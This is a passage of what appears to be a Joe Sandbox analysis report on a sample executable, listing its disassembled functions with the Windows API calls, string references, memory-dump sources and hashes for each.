Opcode Fuzzy Hash: ad4a2699d4fe80a17cd61e302e9b09e40a10c9c8fc8fc0b60fdff6a1dff9b504
Instruction Fuzzy Hash: EB316A72104215BBDF129F64DC08FEB3FAAEF09364F114225FA15A61A0C735D856DBA8

Function 003B6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003B6E3E

Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28

__gmtime64_s.LIBCMT ref: 003B6ED7
__gmtime64_s.LIBCMT ref: 003B6F0D
__gmtime64_s.LIBCMT ref: 003B6F2A
__allrem.LIBCMT ref: 003B6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B6F9C
__allrem.LIBCMT ref: 003B6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B6FD1
__allrem.LIBCMT ref: 003B6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B7006
__invoke_watson.LIBCMT ref: 003B7077

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: fea0436b32602f51e8fa05fb02103732d8bc48e0663cb72ed0307d3f5c466ca8
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: C571FC76A00716ABD716AF68DC42BDAB7B8EF44328F15812EF614DBA81E774DD008790

Function 003F2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003F2542
GetMenuItemInfoW.USER32(00455890,000000FF,00000000,00000030), ref: 003F25A3
SetMenuItemInfoW.USER32(00455890,00000004,00000000,00000030), ref: 003F25D9
Sleep.KERNEL32(000001F4), ref: 003F25EB
GetMenuItemCount.USER32(?), ref: 003F262F
GetMenuItemID.USER32(?,00000000), ref: 003F264B
GetMenuItemID.USER32(?,-00000001), ref: 003F2675
GetMenuItemID.USER32(?,?), ref: 003F26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003F2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F2735

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: a83d4bbacaabb443d7404c5b3dcf931bfc4ae0d60b21d0bc915c892c4627b3d0
Instruction ID: 8095d5868a07832d873486eb8f0a3d6fef5853bb30d962771e4a72c519f7a4fe
Opcode Fuzzy Hash: a83d4bbacaabb443d7404c5b3dcf931bfc4ae0d60b21d0bc915c892c4627b3d0
Instruction Fuzzy Hash: 41618B7090024DEFDB12DFA4CC98DBFBBB9EB01304F154169EA41A7252D771AD0ADB21

Function 00416F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00416FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00416FA8
GetWindowLongW.USER32(?,000000F0), ref: 00416FCC
_memset.LIBCMT ref: 00416FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00416FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00417067

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 7db711dedc74ef29399fa6fedd341c421dbd1cbe95261599a4241af4601ddcd9
Instruction ID: 0a671e43650e96508ffb9d5c0285e673cf446aa292bbbe5bfb35f06d95b7d9e3
Opcode Fuzzy Hash: 7db711dedc74ef29399fa6fedd341c421dbd1cbe95261599a4241af4601ddcd9
Instruction Fuzzy Hash: D2617D75900208AFDB11DFA4CC81EEE77F8EB09710F10416AFA14AB3A2C775AD85DB94

Function 003E6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003E6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 003E6C18
VariantInit.OLEAUT32(?), ref: 003E6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 003E6C4A
VariantCopy.OLEAUT32(?,?), ref: 003E6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 003E6CB1
VariantClear.OLEAUT32(?), ref: 003E6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 003E6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E6CDC
VariantClear.OLEAUT32(?), ref: 003E6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E6CF9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: eabeeb79193e251b4493465fb7dcd100afb9a757f79b0f66cab9f5efc122d10b
Instruction ID: 5bf1aacc24a894dc0728bf3e5ca5f40de020c3643a657ec0a983c5c19bd5bb4a
Opcode Fuzzy Hash: eabeeb79193e251b4493465fb7dcd100afb9a757f79b0f66cab9f5efc122d10b
Instruction Fuzzy Hash: 94417131A001299FCF01DFA9D8459EEBBB9EF18354F00C179E955EB261CB30A946CB94

Function 004083BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

CoInitialize.OLE32 ref: 00408403
CoUninitialize.OLE32 ref: 0040840E
CoCreateInstance.OLE32(?,00000000,00000017,00422BEC,?), ref: 0040846E
IIDFromString.OLE32(?,?), ref: 004084E1
VariantInit.OLEAUT32(?), ref: 0040857B
VariantClear.OLEAUT32(?), ref: 004085DC

Strings

Failed to create object, xrefs: 00408479, 0040852F
NULL Pointer assignment, xrefs: 004084B3
Invalid parameter, xrefs: 004084FA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 22ec7ae36a90eb028f3f9e21c9a1a615ce9ac82b1c6215d279f5bb87127d045a
Instruction ID: 540d143a71b1d1c777ae706d5d2e3f6b812cd047a3545158b4dd0e6cf00f8c30
Opcode Fuzzy Hash: 22ec7ae36a90eb028f3f9e21c9a1a615ce9ac82b1c6215d279f5bb87127d045a
Instruction Fuzzy Hash: 6F61BD70608312AFC711DF14C948F6EB7E8AF49714F00442EF985AB291DB78ED49CB9A

Function 00405732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00405793
inet_addr.WSOCK32(?,?,?), ref: 004057D8
gethostbyname.WSOCK32(?), ref: 004057E4
IcmpCreateFile.IPHLPAPI ref: 004057F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00405862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00405878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004058ED
WSACleanup.WSOCK32 ref: 004058F3

Strings

Ping, xrefs: 00405816

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e0af95b1f511913bbc1d11aec8610f30e4f7d80e622066d579db957aa0863739
Instruction ID: bd82fdb4383a1c5357a667a7aaa4793577efc04c73602409aac952c07fb5532c
Opcode Fuzzy Hash: e0af95b1f511913bbc1d11aec8610f30e4f7d80e622066d579db957aa0863739
Instruction Fuzzy Hash: CC516C326046009FDB11AF24C845B6BB7E4EB49720F04893AF956EB2E1DB34E8059F4A

Function 003FB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003FB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003FB546
GetLastError.KERNEL32 ref: 003FB550
SetErrorMode.KERNEL32(00000000,READY), ref: 003FB5BD

Strings

NOTREADY, xrefs: 003FB57C
READONLY, xrefs: 003FB588
READY, xrefs: 003FB596
INVALID, xrefs: 003FB58F
UNKNOWN, xrefs: 003FB575

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 95621953c1e4df6e00840f40d65ec44fd3fc2eeebcc1098014c336579747f0dc
Instruction ID: 1697e54ddbc6e60b266e4604006d558831ce33a387ada2847f6eb581f4c19cf4
Opcode Fuzzy Hash: 95621953c1e4df6e00840f40d65ec44fd3fc2eeebcc1098014c336579747f0dc
Instruction Fuzzy Hash: 38318275A0020DDFDB02EB68C845BBDB7B8EF46314F10416AF6099B291DB75DA42CB51

Function 003E8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003E9014
GetDlgCtrlID.USER32 ref: 003E901F
GetParent.USER32 ref: 003E903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 003E903E
GetDlgCtrlID.USER32(?), ref: 003E9047
GetParent.USER32(?), ref: 003E9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 003E9066

Strings

ComboBox, xrefs: 003E8F9C
ListBox, xrefs: 003E8FD1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 03c301f937a0f248da1b3a4939db54e4491b7d14f2d343443713601b2317b6d9
Instruction ID: 3cb4e157405b82b7f517eaaaeaa342389004ca679c11cef4dec55c41fec27d64
Opcode Fuzzy Hash: 03c301f937a0f248da1b3a4939db54e4491b7d14f2d343443713601b2317b6d9
Instruction Fuzzy Hash: 5D21D870A00208BBDF06ABA1CC85FFEB774EF49310F504226B511972E1DB75581ADB24

Function 003E907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003E90FD
GetDlgCtrlID.USER32 ref: 003E9108
GetParent.USER32 ref: 003E9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 003E9127
GetDlgCtrlID.USER32(?), ref: 003E9130
GetParent.USER32(?), ref: 003E914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 003E914F

Strings

ComboBox, xrefs: 003E9087
ListBox, xrefs: 003E90BC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 592673dcef45e33fe55773a48f75c93dcd5c6f471645b3f67551d97db89a1e2f
Instruction ID: 217b8bf9ef06d208227a38abf99a3ce6a3404f886b1e72a7b7168b36960d5b10
Opcode Fuzzy Hash: 592673dcef45e33fe55773a48f75c93dcd5c6f471645b3f67551d97db89a1e2f
Instruction Fuzzy Hash: 34210774A40208BBDF12ABA1CC85FFEBB78EF48300F504126F911972E1DB75985ADB20

Function 003E9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 003E916F
GetClassNameW.USER32(00000000,?,00000100), ref: 003E9184
_wcscmp.LIBCMT ref: 003E9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003E9211

Strings

SHELLDLL_DefView, xrefs: 003E9190
largeicons, xrefs: 003E91A5
smallicons, xrefs: 003E91D9
list, xrefs: 003E91F3
details, xrefs: 003E91BF

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 71ad12fbff3606df5bcdedd16e0e6d60d0d1ace2fe4c786ac402b93d6526ac7c
Instruction ID: fd8bdc4df90444ea45ef4862834c4b01cb1f3aa431f19572969cbf29e094b72c
Opcode Fuzzy Hash: 71ad12fbff3606df5bcdedd16e0e6d60d0d1ace2fe4c786ac402b93d6526ac7c
Instruction Fuzzy Hash: 18110A762883ABB9FE132626DC06FE7379C9B15760B300627FB00A48D1FF6298525658

Function 003F7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003F7A6C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: ea423bae6ce154f8d954a513008b30f8da84b5ce846b82f7e3e68f4bf3a5f83d
Instruction ID: 88f5b08f40eddcfb6d19d10ebeb37dd808e8923fb3bc170299bdae354cd480c1
Opcode Fuzzy Hash: ea423bae6ce154f8d954a513008b30f8da84b5ce846b82f7e3e68f4bf3a5f83d
Instruction Fuzzy Hash: 94B18D7190421E9FDB12DFA4D885BBEB7B8FF09321F214429EA11EB291D774E941CB90

Function 003F11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003F11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F1204
GetWindowThreadProcessId.USER32(00000000), ref: 003F120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F0268,?,00000001), ref: 003F121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 003F122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F0268,?,00000001), ref: 003F1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F0268,?,00000001), ref: 003F1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F12BC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f27ad11865110453056050af7f991f07d0a2f9dd4b7a164268847b05fa71579a
Instruction ID: aeccba3e3ba31f38f4c545d447a60c28bbd12c379f19d79f6e686a461ad3ccd6
Opcode Fuzzy Hash: f27ad11865110453056050af7f991f07d0a2f9dd4b7a164268847b05fa71579a
Instruction Fuzzy Hash: 3431BF76A00308FBDB11DF94FC88BBA37A9AB54322F128535FA05C72A1D7749D458B58

Function 0039FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0039FAA6
OleUninitialize.OLE32(?,00000000), ref: 0039FB45
UnregisterHotKey.USER32(?), ref: 0039FC9C
DestroyWindow.USER32(?), ref: 003D45D6
FreeLibrary.KERNEL32(?), ref: 003D463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 003D4668

Strings

close all, xrefs: 0039FAA1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f9af7067a2bd50b808434a296b2a88bc111ed5849fdf6ec9e2fef3b57697ccc3
Instruction ID: 7acb2897cedf7d5c9b973782e6d1f833bfe9c0c5e9fb628f76d7d4a0ac9ce7f2
Opcode Fuzzy Hash: f9af7067a2bd50b808434a296b2a88bc111ed5849fdf6ec9e2fef3b57697ccc3
Instruction Fuzzy Hash: 58A17A31701212CFCB2AEF24D595B69F3A4BF05714F1582AEE80AAB261DB30ED16CF50

Function 00409113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00409167
VariantInit.OLEAUT32(?), ref: 00409238
VariantInit.OLEAUT32(?), ref: 00409339
VariantClear.OLEAUT32(?), ref: 00409343
VariantClear.OLEAUT32(?), ref: 004093A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 004091C8, 004092F6, 004093AE
Incorrect Object type in FOR..IN loop, xrefs: 0040931C
,,B, xrefs: 004091E5

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,B$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-558401663
Opcode ID: 9c6f2f41e11ed323edc96882193bfd57de015696be0a3fc7221d71e41d8806ed
Instruction ID: ad5b28c3ec9eb3c38d62719543025400840c100cb5f6177e92fde7a95fad2c6f
Opcode Fuzzy Hash: 9c6f2f41e11ed323edc96882193bfd57de015696be0a3fc7221d71e41d8806ed
Instruction Fuzzy Hash: 61918F70A00215ABDF24DFA5C848FAFB7B8AF49710F10856EE915AB2C1D7749D05CFA4

Function 003EA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,003EA439), ref: 003EA377

Strings

INSTANCE, xrefs: 003EA285
CLASS, xrefs: 003EA0F6
CLASSNN, xrefs: 003EA119
NAME, xrefs: 003EA1A9
REGEXPCLASS, xrefs: 003EA13C
TEXT, xrefs: 003EA2AE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 8022b41b778fe347e501c48187ebcb6b26e4e0d091d64ae62cf8235e17268fe1
Instruction ID: df50ed26887a907c32060eae66aa7ccd19d231ec55c16a6b391caba21751faa8
Opcode Fuzzy Hash: 8022b41b778fe347e501c48187ebcb6b26e4e0d091d64ae62cf8235e17268fe1
Instruction Fuzzy Hash: AB91E730A00A59ABDB0AEFA1C441BEEFBB4FF04304F54861AD549AB1C1DF317999CB91

Function 00392E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00392EAE

Part of subcall function 00391DB3: GetClientRect.USER32(?,?), ref: 00391DDC
